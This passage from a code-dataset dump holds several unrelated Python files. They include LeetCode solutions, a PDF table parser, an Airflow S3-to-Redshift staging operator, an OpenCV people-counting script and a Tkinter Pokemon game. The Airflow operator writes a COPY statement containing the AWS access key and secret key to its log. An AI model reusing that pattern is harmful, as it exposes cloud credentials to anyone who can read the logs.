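    For example, with the input list 1->2->3->4->5 and m = 2, n = 4, right finishes its forward walk at the 4th node while left stops at the 2nd node; swapping values as the recursion unwinds yields 1->4->3->2->5.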
If this is not clear at the moment, the diagrams that follow will help.\n    Additionally, we have a pointer called left which starts from the m-th node in the linked list and moves forward. In Python, we have to keep it in a shared variable (an attribute or a global) so that its updates persist across recursive calls. In other languages, where changes made in function calls persist, we can consider this pointer as an additional variable for the function recurse.\n    In a recursion call, given m, n, and right, we check if n == 1. If this is the case, we don't need to go any further.\n    Until we reach n == 1, we keep moving the right pointer one step forward and, after doing that, we make a recursive call with the value of n decreased by 1. At the same time, we keep moving the left pointer forward until m == 1. When we refer to a pointer being moved forward, it essentially means pointer = pointer.next.\n    We backtrack as soon as n reaches 1. At that point, the right pointer is at the last node of the sublist we want to reverse, and left has already reached the first node of this sublist. So we swap the node values and move the left pointer one step forward using left = left.next. We need this change to persist across the backtracking process.\n    From there on, every time we backtrack, the right pointer moves one step backwards. This is the simulation we have been mentioning all along: the backward movement is simulated by backtracking.\n    We stop the swaps when either right == left, which happens if the sublist size is odd, or right.next == left, which happens when, during the backtracking for an even-sized sublist, the right pointer crosses left. We use a shared boolean flag to stop the swaps once either condition is met.\n    Let's look at a series of diagrams explaining the process on a sample linked list. Hopefully, things will be clearer after this.
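\n\n    A minimal sketch of the recursive procedure described above (illustrative only; it assumes the usual ListNode class with val and next attributes, and keeps left and the stop flag on self so updates persist across calls):\n\n        def reverse_between_recursive(self, head, m, n):\n            self.left, self.stop = head, False\n\n            def recurse(right, m, n):\n                if n == 1:\n                    return\n                # move right forward; left advances only while m > 1\n                right = right.next\n                if m > 1:\n                    self.left = self.left.next\n                recurse(right, m - 1, n - 1)\n                # while backtracking, stop once the pointers meet or cross\n                if self.left is right or right.next is self.left:\n                    self.stop = True\n                if not self.stop:\n                    # swap the values and advance left by one node\n                    self.left.val, right.val = right.val, self.left.val\n                    self.left = self.left.next\n\n            recurse(head, m, n)\n            return head\n\n    Complexity Analysis\n\n    Time Complexity: O(N), since the list consists of N nodes.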
We process each of the nodes at most once (we don't process the nodes after the n-th node from the beginning).\n    Space Complexity: O(1), since we simply adjust some pointers in the original linked list and only use O(1) additional memory for achieving the final result.\n\n    \"\"\"\n    def doit_(self, head, m, n):\n        \"\"\"\n        :type head: ListNode\n        :type m: int\n        :type n: int\n        :rtype: ListNode\n        \"\"\"\n\n        # Empty list\n        if not head:\n            return None\n\n        # Move the two pointers until they reach the proper starting point\n        # in the list.\n        cur, prev = head, None\n        while m > 1:\n            prev = cur\n            cur = cur.next\n            m, n = m - 1, n - 1\n\n        # The two pointers that will fix the final connections.\n        tail, con = cur, prev\n\n        # Iteratively reverse the nodes until n becomes 0.\n        # Note: a single tuple assignment like cur, cur.next, prev = cur.next, prev, cur\n        # would write the targets in the wrong order, so use an explicit temporary.\n        while n:\n            third = cur.next\n            cur.next = prev\n            prev = cur\n            cur = third\n            n -= 1\n\n        # Adjust the final connections as explained in the algorithm\n        if con:\n            con.next = prev\n        else:\n            head = prev\n        tail.next = cur\n        return head\n\n    def doit_insertion(self, head, m, n):\n        \"\"\"\n        Alternative one pass: repeatedly unlink the node after pStart and\n        re-insert it right after pEnd (head insertion before the sublist).\n        :type head: ListNode\n        :type m: int\n        :type n: int\n        :rtype: ListNode\n        \"\"\"\n        preHead = ListNode(1000)\n        pt, preHead.next, i = preHead, head, 1\n        while pt and i < m:\n            pt = pt.next\n            i += 1\n\n        pStart, pEnd = pt.next, pt\n        while pStart and i < n:\n            p = pStart.next\n            pStart.next = p.next\n            p.next = pEnd.next\n            pEnd.next = p\n            i += 1\n\n        return preHead.next","sub_path":"PythonLeetcode/leetcodeM/92_ReverseLinkedListII.py","file_name":"92_ReverseLinkedListII.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61577602","text":"import re\nfrom glob import glob\nfrom os.path import basename, join\n\nimport pandas as pd\nimport tabula\n\nimport tools.HelperFunction as hp\n\nclass AppendixSpecies(object):\n    def __init__(self, file):\n        self.file = file\n        self.year = int(basename(self.file)[:4])\n        self.pdf = tabula.read_pdf(self.file, encoding='utf-8', spreadsheet=True, \n                                   output_format=\"tsv\", silent=True, \n                                   multiple_tables=True, pages=\"all\")\n\n    def dirtyWork(self):\n        page = 0\n        table = pd.DataFrame()\n        while page < len(self.pdf):\n            num = self.pdf[page].iloc[1:, 0].astype(str).str.replace(\" \",\"\")\n            che = self.pdf[page].iloc[1:, 1].str.replace(\" \", \"\").str.replace(\"\\r\", \" \")\n            eng = self.pdf[page].iloc[1:, 2].str.replace(\"\\r\", \" \")\n            scn = self.pdf[page].iloc[1:, 3].str.replace(\"\\r\", \" \")\n            ccn = self.pdf[page].iloc[1:, 4].str.replace(\" \", \"\").str.replace(\"\\r\", \" \").str.replace(\" \", \"\")\n\n            tmp = pd.concat([num, che, eng, scn, ccn], axis=1) \n\n            table = pd.concat([table, tmp], ignore_index=True)\n            page += 1\n\n        table = table.T.reset_index(drop=True).T\n        \n        table.rename(columns={0: \"species_code\", 1: \"chinese_name\", 2: \"english_name\", 3: \"scientific_name\", 4: \"common_name\"}, inplace=True)\n        \n        table.insert(loc=0, column='year', value=self.year)\n        \n        table = table[table['species_code'].str.contains(\"[0-9]\")]\n\n        if self.year <= 2013:\n            table['species_code'] = table['species_code'].astype(str).str.zfill(4)\n        else:\n            table['species_code'] = table['species_code'].astype(str).str.zfill(5)\n\n        return table\n\ndef main():\n    file_list = glob(\"./raw/附錄_魚類名代碼/*\")\n\n    df = pd.DataFrame()\n    for file in file_list: \n        print(file)\n        f = AppendixSpecies(file) \n        final = f.dirtyWork() \n        df = pd.concat([final, df]).sort_values(by=['year', 
'species_code'])\n \n df.rename(columns={\"year\": \"年份\",\n \"species_code\": \"魚種代碼\", \n \"chinese_name\": \"魚種中文名\", \n \"english_name\": \"魚種英文名\",\n \"scientific_name\": \"魚種學名\",\n \"common_name\": \"魚種俗名\"\n }, inplace=True)\n \n df.to_csv('./results/附錄_魚類名代碼.csv', index=False)\n\nif __name__ == \"__main__\":\n main()\n \n","sub_path":"scripts/appendix_species.py","file_name":"appendix_species.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519328871","text":"\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, val=0, left=None, right=None):\r\n# self.val = val\r\n# self.left = left\r\n# self.right = right\r\nclass Solution:\r\n def maxDepth(self, root: TreeNode) -> int:\r\n \r\n if root is None:\r\n return 0\r\n tree= [root]\r\n depth = 0\r\n while tree:\r\n depth += 1\r\n for i in range(len(tree)):\r\n temp = tree.pop(0)\r\n if temp.left:\r\n tree.append(temp.left)\r\n if temp.right:\r\n tree.append(temp.right)\r\n return depth\r\n \r\n \r\n ","sub_path":"104_maximum_depth_binary_tree.py","file_name":"104_maximum_depth_binary_tree.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"286789650","text":"import pandas as pd\nimport glob\n\nif __name__ == '__main__':\n path = r'C:\\Users\\kwaneung\\Documents\\GitHub\\FinTec\\경제지표'\n allFiles = glob.glob(path + '/*.csv')\n frame = pd.read_csv('^KS11.csv', encoding='CP949')\n list_ = []\n cnt = 0\n\n for file_ in allFiles:\n print(\"read \" + file_)\n df = pd.read_csv(file_, encoding='CP949')\n frame = pd.merge(frame, df, on='DATE')\n\n frame = frame.dropna()\n frame = frame.set_index('DATE')\n frame.to_csv(\"KOSPI_FRAME.csv\", encoding='CP949')\n\n corr = frame.corr(method='pearson') # 상관계수\n corr.to_csv('corr.csv', encoding='CP949')","sub_path":"Kospi_v3/Merge.py","file_name":"Merge.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113877033","text":"# N과 M (1)\nN, M = map(int, input().split())\nvisited = [0]*N\narr = range(1, N+1)\ntemp = [0]*M\n\n\ndef perm(k):\n if k == M:\n for t in temp:\n print(t, end=' ')\n print()\n else:\n for i in range(N):\n if visited[i]:\n continue\n temp[k] = arr[i]\n visited[i] = 1\n perm(k + 1)\n visited[i] = 0\n\n\nperm(0)\n","sub_path":"2019/1912/BJ15649.py","file_name":"BJ15649.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"128463169","text":"from airflow.contrib.hooks.aws_hook import AwsHook\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass StageToRedshiftOperator(BaseOperator):\n ui_color = '#358140'\n template_fields = (\"s3_key\",)\n copy_sql = \"\"\"\n COPY {}\n FROM '{}'\n ACCESS_KEY_ID '{}'\n SECRET_ACCESS_KEY '{}'\n {} '{}'\n\"\"\"\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id=\"\",\n aws_credentials_id=\"\",\n table=\"\",\n s3_bucket=\"\",\n s3_key=\"\",\n file_format = 'JSON',\n file_struct = 'auto',\n create_SQL = \"\",\n *args, **kwargs):\n\n super(StageToRedshiftOperator, self).__init__(*args, **kwargs)\n self.table = table\n self.redshift_conn_id = redshift_conn_id\n self.s3_bucket = s3_bucket\n self.s3_key = s3_key\n self.aws_credentials_id 
= aws_credentials_id\n self.file_format = file_format\n self.file_struct = file_struct\n self.execution_date = kwargs.get('execution_date')\n self.create_SQL = create_SQL\n \n def execute(self, context):\n self.log.info(f\"StageToRedshiftOperator processing {self.table}\")\n aws_hook = AwsHook(self.aws_credentials_id)\n credentials = aws_hook.get_credentials()\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n\n self.log.info(f\"Creating {self.table}\")\n redshift.run(self.create_SQL)\n\n self.log.info(f\"Clearing data from {self.table}\")\n redshift.run(f\"DELETE FROM {self.table}\")\n\n self.log.info(f\"Copying data from S3 to Redshift table {self.table}\")\n rendered_key = self.s3_key.format(**context)\n s3_path = \"s3://{}/{}\".format(self.s3_bucket, rendered_key)\n formatted_sql = StageToRedshiftOperator.copy_sql.format(\n self.table,\n s3_path,\n credentials.access_key,\n credentials.secret_key,\n self.file_format,\n self.file_struct\n )\n self.log.info(formatted_sql)\n redshift.run(formatted_sql)\n\n\n\n\n\n","sub_path":"home/airflow/plugins/operators/stage_redshift.py","file_name":"stage_redshift.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"43911699","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('revisions', '0007_auto_20141123_0513'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='revision',\n name='ref_id',\n field=models.IntegerField(default=1, db_index=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='revision',\n name='refmodel',\n field=models.CharField(default='', max_length=10, db_index=True, choices=[(b'pack', b'Pack models'), (b'collection', b'Collection models')]),\n preserve_default=False,\n ),\n ]\n","sub_path":"revisions/migrations/0008_auto_20141123_0541.py","file_name":"0008_auto_20141123_0541.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"139748072","text":"from mylib.centroidtracker import CentroidTracker\r\nfrom mylib.trackableobject import TrackableObject\r\nfrom imutils.video import VideoStream\r\nfrom imutils.video import FPS\r\nfrom mylib.mailer import Mailer\r\nfrom mylib import config, thread\r\nimport time, schedule, csv\r\nimport numpy as np\r\nimport argparse, imutils\r\nimport time, dlib, cv2, datetime\r\nfrom itertools import zip_longest\r\n\r\nt0 = time.time()\r\n\r\ndef run():\r\n\r\n\tap = argparse.ArgumentParser()\r\n\tap.add_argument(\"-p\", \"--prototxt\", required=False)\r\n\tap.add_argument(\"-m\", \"--model\", required=True)\r\n\tap.add_argument(\"-i\", \"--input\", type=str)\r\n\tap.add_argument(\"-o\", \"--output\", type=str)\r\n\tap.add_argument(\"-c\", \"--confidence\", type=float, default=0.4)\r\n\tap.add_argument(\"-s\", \"--skip-frames\", type=int, default=30)\r\n\targs = vars(ap.parse_args())\r\n\r\n\t# list of class labels MobileNet SSD trained to detect\r\n\tCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\r\n\t\t\"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\r\n\t\t\"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\r\n\t\t\"sofa\", \"train\", \"tvmonitor\"]\r\n\r\n\t# load serialized model\r\n\tnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], 
args[\"model\"])\r\n\r\n\t# import vid file\r\n\tprint(\"Stating vid\")\r\n\tvs = cv2.VideoCapture(args[\"input\"])\r\n\r\n\twriter = None\r\n\tW = None\r\n\tH = None\r\n\r\n\t# init centroid tracker\r\n\tct = CentroidTracker(maxDisappeared=40, maxDistance=50)\r\n\ttrackers = []\r\n\ttrackableObjects = {}\r\n\r\n\ttotalFrames = 0\r\n\ttotalDown = 0\r\n\ttotalUp = 0\r\n\tx = []\r\n\tempty=[]\r\n\tempty1=[]\r\n\r\n\t# process fps\r\n\tfps = FPS().start()\r\n\r\n\tif config.Thread:\r\n\t\tvs = thread.ThreadingClass(config.url)\r\n\r\n\t# loop vid frames\r\n\twhile True:\r\n\t\tframe = vs.read()\r\n\t\tframe = frame[1]\r\n\r\n\t\tif frame is None:\r\n\t\t\tbreak\r\n\r\n\t\t# resize frame\r\n\t\tframe = imutils.resize(frame, width = 500)\r\n\t\trgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n\r\n\t\t# set frame dimensions\r\n\t\tif W is None or H is None:\r\n\t\t\t(H, W) = frame.shape[:2]\r\n\r\n\t\tstatus = \"Waiting\"\r\n\t\trects = []\r\n\r\n\t\t# check to see if we should run a more computationally expensive\r\n\t\t# object detection method to aid our tracker\r\n\t\tif totalFrames % args[\"skip_frames\"] == 0:\r\n\t\t\t# set the status and initialize our new set of object trackers\r\n\t\t\tstatus = \"Detecting\"\r\n\t\t\ttrackers = []\r\n\r\n\t\t\t# convert the frame to a blob and pass the blob through the\r\n\t\t\t# network and obtain the detections\r\n\t\t\tblob = cv2.dnn.blobFromImage(frame, 0.007843, (W, H), 127.5)\r\n\t\t\tnet.setInput(blob)\r\n\t\t\tdetections = net.forward()\r\n\r\n\t\t\t# loop over the detections\r\n\t\t\tfor i in np.arange(0, detections.shape[2]):\r\n\t\t\t\t# extract the confidence (i.e., probability) associated\r\n\t\t\t\t# with the prediction\r\n\t\t\t\tconfidence = detections[0, 0, i, 2]\r\n\r\n\t\t\t\t# filter out weak detections by requiring a minimum\r\n\t\t\t\t# confidence\r\n\t\t\t\tif confidence > args[\"confidence\"]:\r\n\t\t\t\t\t# extract the index of the class label from the\r\n\t\t\t\t\t# detections list\r\n\t\t\t\t\tidx = int(detections[0, 0, i, 1])\r\n\r\n\t\t\t\t\t# if the class label is not a person, ignore it\r\n\t\t\t\t\tif CLASSES[idx] != \"person\":\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\t# compute the (x, y)-coordinates of the bounding box\r\n\t\t\t\t\t# for the object\r\n\t\t\t\t\tbox = detections[0, 0, i, 3:7] * np.array([W, H, W, H])\r\n\t\t\t\t\t(startX, startY, endX, endY) = box.astype(\"int\")\r\n\r\n\r\n\t\t\t\t\t# construct a dlib rectangle object from the bounding\r\n\t\t\t\t\t# box coordinates and then start the dlib correlation\r\n\t\t\t\t\t# tracker\r\n\t\t\t\t\ttracker = dlib.correlation_tracker()\r\n\t\t\t\t\trect = dlib.rectangle(startX, startY, endX, endY)\r\n\t\t\t\t\ttracker.start_track(rgb, rect)\r\n\r\n\t\t\t\t\t# add the tracker to our list of trackers so we can\r\n\t\t\t\t\t# utilize it during skip frames\r\n\t\t\t\t\ttrackers.append(tracker)\r\n\r\n\t\t# otherwise, we should utilize our object *trackers* rather than\r\n\t\t# object *detectors* to obtain a higher frame processing throughput\r\n\t\telse:\r\n\t\t\t# loop over the trackers\r\n\t\t\tfor tracker in trackers:\r\n\t\t\t\t# set the status of our system to be 'tracking' rather\r\n\t\t\t\t# than 'waiting' or 'detecting'\r\n\t\t\t\tstatus = \"Tracking\"\r\n\r\n\t\t\t\t# update the tracker and grab the updated position\r\n\t\t\t\ttracker.update(rgb)\r\n\t\t\t\tpos = tracker.get_position()\r\n\r\n\t\t\t\t# unpack the position object\r\n\t\t\t\tstartX = int(pos.left())\r\n\t\t\t\tstartY = int(pos.top())\r\n\t\t\t\tendX = int(pos.right())\r\n\t\t\t\tendY = 
int(pos.bottom())\r\n\r\n\t\t\t\t# add the bounding box coordinates to the rectangles list\r\n\t\t\t\trects.append((startX, startY, endX, endY))\r\n\r\n\t\t# draw a vertical line in the center of the frame -- once an\r\n\t\t# object crosses this line we will determine whether it was\r\n\t\t# moving 'left' (exit) or 'right' (enter)\r\n\t\tcv2.line(frame, (W // 2, 0), (W // 2, H), (0, 0, 0), 3)\r\n\r\n\t\t# cv2.putText(frame, \"-Prediction border - Entrance-\", (10, H - ((i * 20) + 200)),\r\n\t\t# \tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)\r\n\r\n\t\t# use the centroid tracker to associate the (1) old object\r\n\t\t# centroids with (2) the newly computed object centroids\r\n\t\tobjects = ct.update(rects)\r\n\r\n\t\t# loop over the tracked objects\r\n\t\tfor (objectID, centroid) in objects.items():\r\n\t\t\t# check to see if a trackable object exists for the current\r\n\t\t\t# object ID\r\n\t\t\tto = trackableObjects.get(objectID, None)\r\n\r\n\t\t\t# if there is no existing trackable object, create one\r\n\t\t\tif to is None:\r\n\t\t\t\tto = TrackableObject(objectID, centroid)\r\n\r\n\t\t\t# otherwise, there is a trackable object so we can utilize it\r\n\t\t\t# to determine direction\r\n\t\t\telse:\r\n\t\t\t\t# the difference between the x-coordinate of the *current*\r\n\t\t\t\t# centroid and the mean of *previous* centroids tells us\r\n\t\t\t\t# in which direction the object is moving (negative for\r\n\t\t\t\t# 'left' and positive for 'right')\r\n\t\t\t\txs = [c[0] for c in to.centroids]\r\n\t\t\t\tdirection = centroid[0] - np.mean(xs)\r\n\t\t\t\tto.centroids.append(centroid)\r\n\r\n\t\t\t\t# check to see if the object has been counted or not\r\n\t\t\t\tif not to.counted:\r\n\t\t\t\t\t# compare the x-coordinate against the vertical line at W // 2\r\n\t\t\t\t\t# (not H // 2, which is half the frame height)\r\n\t\t\t\t\tif direction < 0 and centroid[0] < W // 2:\r\n\t\t\t\t\t\ttotalUp += 1\r\n\t\t\t\t\t\tempty.append(totalUp)\r\n\t\t\t\t\t\tto.counted = True\r\n\r\n\t\t\t\t\t# if the direction is positive (indicating the object\r\n\t\t\t\t\t# is moving right) AND the centroid is past the\r\n\t\t\t\t\t# center line, count the object\r\n\t\t\t\t\telif direction > 0 and centroid[0] > W // 2:\r\n\t\t\t\t\t\ttotalDown += 1\r\n\t\t\t\t\t\tempty1.append(totalDown)\r\n\t\t\t\t\t\tx = []\r\n\t\t\t\t\t\t# compute the sum of total people inside\r\n\t\t\t\t\t\tx.append(len(empty1)-len(empty))\r\n\t\t\t\t\t\tto.counted = True\r\n\r\n\t\t\t# store the trackable object in our dictionary\r\n\t\t\ttrackableObjects[objectID] = to\r\n\r\n\t\t\t# draw both the ID of the object and the centroid of the\r\n\t\t\t# object on the output frame\r\n\t\t\ttext = \"ID {}\".format(objectID)\r\n\t\t\tcv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10),\r\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\r\n\t\t\tcv2.circle(frame, (centroid[0], centroid[1]), 4, (255, 255, 255), -1)\r\n\r\n\t\t# construct the information we will be displaying on the frame\r\n\t\tinfo = [\r\n\t\t(\"Exit\", totalUp),\r\n\t\t(\"Enter\", totalDown),\r\n\t\t(\"Status\", status),\r\n\t\t]\r\n\r\n\t\tinfo2 = [\r\n\t\t(\"Total people inside\", x),\r\n\t\t]\r\n\r\n\t\t# Display the output\r\n\t\tfor (i, (k, v)) in enumerate(info):\r\n\t\t\ttext = \"{}: {}\".format(k, v)\r\n\t\t\tcv2.putText(frame, text, (10, H - ((i * 20) + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 0), 2)\r\n\r\n\t\tfor (i, (k, v)) in enumerate(info2):\r\n\t\t\ttext = \"{}: {}\".format(k, v)\r\n\t\t\tcv2.putText(frame, text, (265, H - ((i * 20) + 60)), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)\r\n\r\n\t\t# Initiate a simple log to save data at end of the day\r\n\t\tif 
config.Log:\r\n\t\t\tdatetimee = [datetime.datetime.now()]\r\n\t\t\td = [datetimee, empty1, empty, x]\r\n\t\t\texport_data = zip_longest(*d, fillvalue = '')\r\n\r\n\t\t\twith open('Log.csv', 'w', newline='') as myfile:\r\n\t\t\t\twr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\r\n\t\t\t\twr.writerow((\"End Time\", \"In\", \"Out\", \"Total Inside\"))\r\n\t\t\t\twr.writerows(export_data)\r\n\r\n\t\t# show the output frame\r\n\t\tcv2.imshow(\"Real-Time Monitoring/Analysis Window\", frame)\r\n\t\tkey = cv2.waitKey(1) & 0xFF\r\n\r\n\t\t# if the `q` key was pressed, break from the loop\r\n\t\tif key == ord(\"q\"):\r\n\t\t\tbreak\r\n\r\n\t\t# increment the total number of frames processed thus far and\r\n\t\t# then update the FPS counter\r\n\t\ttotalFrames += 1\r\n\t\tfps.update()\r\n\r\n\t# stop the timer and display FPS information\r\n\tfps.stop()\r\n\tprint(\"[INFO] elapsed time: {:.2f}\".format(fps.elapsed()))\r\n\tprint(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\r\n\r\n\t# close any open windows\r\n\tcv2.destroyAllWindows()\r\n\r\nrun()\r\n","sub_path":"Run-SideView.py","file_name":"Run-SideView.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627891761","text":"import tkinter as tk\nimport random\n\n\nclass Pokemon:\n def __init__(self,name,dexnum,rate,speed):\n self.name = name\n self.dex = int(dexnum)\n self.catchrate = int(rate)\n self.speed = int(speed)\n #Path to image location made into a PhotoImage object\n self.photo = tk.PhotoImage(file = \"sprites/\" + str(self.dex) + \".gif\")\n \n def __str__(self):\n return str(self.name)\n \n\n\nclass SafariSimulator(tk.Frame):\n def __init__(self, master=None):\n #Stores pokemon data in a 2D list\n pokedex = open('pokedex.csv')\n lines_list = pokedex.readlines()\n pokedex.close()\n pokelist = []\n for line in lines_list:\n line = line.strip('\\n').split(',')\n pokelist.append(line)\n\n #Stored instance variables\n self.pokelist = pokelist\n self.balls_left = 30\n self.pokemon_caught = []\n self.pokemon_num = 0\n\n #Creates playing window\n tk.Frame.__init__(self, master)\n master.minsize(width=275, height=350)\n master.maxsize(width=275, height=350)\n master.title(\"Safari Zone Simulator\")\n self.pack()\n self.nextPokemon()\n self.createWidgets()\n \n\n\n def createWidgets(self):\n #GUI components\n self.runButton = tk.Button(self)\n self.runButton[\"text\"] = \"Run Away\"\n self.runButton[\"command\"] = self.nextPokemon\n self.runButton.pack()\n \n\n self.throwButton = tk.Button(self)\n self.throwButton[\"text\"] = \"Throw Ball (\" + str(self.balls_left) + \" left)\"\n self.throwButton[\"command\"] = self.throwBall\n self.throwButton.pack()\n\n\n self.messageLabel = tk.Label(bg=\"grey\")\n self.messageLabel[\"text\"] = \"You encounter a wild \" + self.pokemon.name\n self.messageLabel.pack(fill=\"x\", padx=5, pady=5)\n\n\n self.pokemonImageLabel = tk.Label()\n self.pokemonImageLabel[\"image\"] = self.pokemon.photo\n self.pokemonImageLabel.pack()\n\n \n \n self.catchProbLabel = tk.Label(bg=\"grey\")\n self.catchProbLabel[\"text\"] = \"Your chance of catching it is \" + str(int(min(self.pokemon.catchrate + 1, 151)/4.495)) + \"%!\"\n self.catchProbLabel.pack(fill=\"x\", padx=5, pady=5)\n\n\n\n def nextPokemon(self):\n #Generates random number which represents index for pokemon in self.pokelist \n num = random.randint(1,151)\n #Uses data to create Pokemon object\n self.pokelist[num][0] = 
self.pokelist[num][0] if isinstance(self.pokelist[num][0], Pokemon) else Pokemon(self.pokelist[num][1],self.pokelist[num][0],self.pokelist[num][2],self.pokelist[num][3])\n #Rows are mutated in place: after the first encounter the dex slot already holds the\n #Pokemon object, so reuse it instead of calling int() on an object on repeat draws\n #Assigns the Pokemon object to self.pokemon\n self.pokemon = self.pokelist[num][0]\n\n #Updates the text and images in the GUI labels\n self.pokemon_num += 1 #avoids labels being packed multiple times\n if self.pokemon_num > 1:\n self.messageLabel[\"text\"] = \"You encounter a wild \" + self.pokemon.name\n self.pokemonImageLabel[\"image\"] = self.pokemon.photo\n self.catchProbLabel[\"text\"] = \"Your chance of catching it is \" + str(int(min(self.pokemon.catchrate + 1, 151)/4.495)) + \"%!\"\n \n\n \n def endAdventure(self):\n #clears screen\n self.runButton.pack_forget()\n self.throwButton.pack_forget()\n self.messageLabel.pack_forget()\n self.pokemonImageLabel.pack_forget()\n self.catchProbLabel.pack_forget()\n\n\n #Displays messages for end of game\n self.endMessage = tk.Label(bg=\"grey\")\n self.endMessage[\"text\"] = \"You're all out of balls, hope you had fun!\"\n self.endMessage.pack(fill=\"x\",padx=5,pady=5)\n\n self.caughtPokemon = tk.Label(bg=\"grey\")\n if len(self.pokemon_caught) > 0: #Determines whether or not player caught any Pokemon\n self.caughtPokemon[\"text\"] = \"You caught \" + str(len(self.pokemon_caught)) + \" Pokemon\\n\" + \"\\n\".join(self.pokemon_caught)\n else:\n self.caughtPokemon[\"text\"] = \"Oops, you caught 0 Pokemon.\"\n self.caughtPokemon.pack(fill=\"x\",padx=5,pady=0)\n\n \n\n def throwBall(self):\n self.balls_left -= 1\n\n #Updates the text in self.throwButton\n self.throwButton[\"text\"] = \"Throw Ball (\" + str(self.balls_left) + \" left)\"\n \n if random.random() < (min(self.pokemon.catchrate + 1, 151))/449.5: #Checks if Pokemon should be caught\n self.pokemon_caught.append(self.pokemon.name) #Adds Pokemon name to list\n self.nextPokemon()\n else:\n self.messageLabel[\"text\"] = \"Aargh! It escaped\"\n\n if self.balls_left == 0:\n self.endAdventure()\n \n \n\napp = SafariSimulator(tk.Tk())\napp.mainloop()\n","sub_path":"UMN-CSCI/In Class/Pokemon/Original.py","file_name":"Original.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"627781585","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n# Filename: bestset.py\r\n# Author: Pedro H. A. 
Hasselmann\r\n\r\n# Written in Python 3 style while running on Python 2.6:\r\nfrom __future__ import print_function, unicode_literals, absolute_import, division\r\nfrom os import path\r\nfrom collections import deque\r\n\r\ndef fit(where_data, q1_range, m_range):\r\n import Gmode as Gm\r\n from numpy import arange\r\n \r\n gmode = Gm.Gmode()\r\n \r\n gmode.load_data(filename=where_data)\r\n gmode.grid = 2\r\n \r\n form = \"{0:.2f} {1:.2f} {2:3} {3:4} {4:.4f}\".format\r\n report = deque([\"q1 mlim Nc E R\"])\r\n for mlim in arange(*m_range):\r\n for q1 in arange(*q1_range):\r\n gmode.q1 = q1\r\n gmode.mlim = mlim\r\n gmode.run(realtime_map='n', save='n')\r\n \r\n report.append(form(q1, mlim, len(gmode.cluster_stats), len(gmode.excluded), gmode.robust))\r\n\r\n out = open(path.join(\"TESTS\",\"tests.txt\"),\"w+\")\r\n\r\n text = '\\n'.join(list(report))\r\n\r\n out.write(text)\r\n out.close()\r\n\r\ndef plot(highlight=None, tests=\"tests.txt\", **lim):\r\n import matplotlib.pyplot as plt\r\n from numpy import loadtxt\r\n \r\n q1, mlim, Nc, excluded, robust = loadtxt(path.join(\"TESTS\",tests), unpack=True, dtype=None, skiprows=1)\r\n \r\n name = ['({0:.2f}, {1:.2f})'.format(*item) for item in zip(q1, mlim)]\r\n\r\n plt.figure(figsize=(10,10),dpi=100)\r\n\r\n # Robustness vs Nc (subplot indices are 1-based: 2 rows, 1 column, first panel)\r\n plt.subplot(211)\r\n plt.plot(Nc, robust, \"ko\", markersize=4, alpha=0.7, label=\"Gmode Tests ($G_{q_{1}}, minlimit$)\")\r\n\r\n\r\n for n, texto in enumerate(name):\r\n #if any([True if item[0] == q1[n] and item[1] == mlim[n] else False for item in highlight]):\r\n if Nc[n] >= lim[\"Nc\"][0] and Nc[n] <= lim[\"Nc\"][1] and robust[n] <= lim[\"robust\"] \\\r\n and excluded[n] >= lim[\"excluded\"][0] and excluded[n] <= lim[\"excluded\"][1]:\r\n highl = plt.plot(Nc[n], robust[n], color=\"red\", marker=\"o\", markersize=7)\r\n plt.text(Nc[n], robust[n], texto, fontsize=8, fontweight='black', style='italic') \r\n highl[0].set_label(texto)\r\n \r\n plt.xlabel(\"$N_{c}$\")\r\n plt.ylabel(\"Robustness\")\r\n plt.legend(loc=0, numpoints=1, scatterpoints=1, fontsize=9)\r\n\r\n # Number of excluded vs robustness (second panel)\r\n plt.subplot(212)\r\n plt.plot(robust, excluded, \"ko\", markersize=4, alpha=0.7, label=\"Gmode Tests ($G_{q_{1}}, 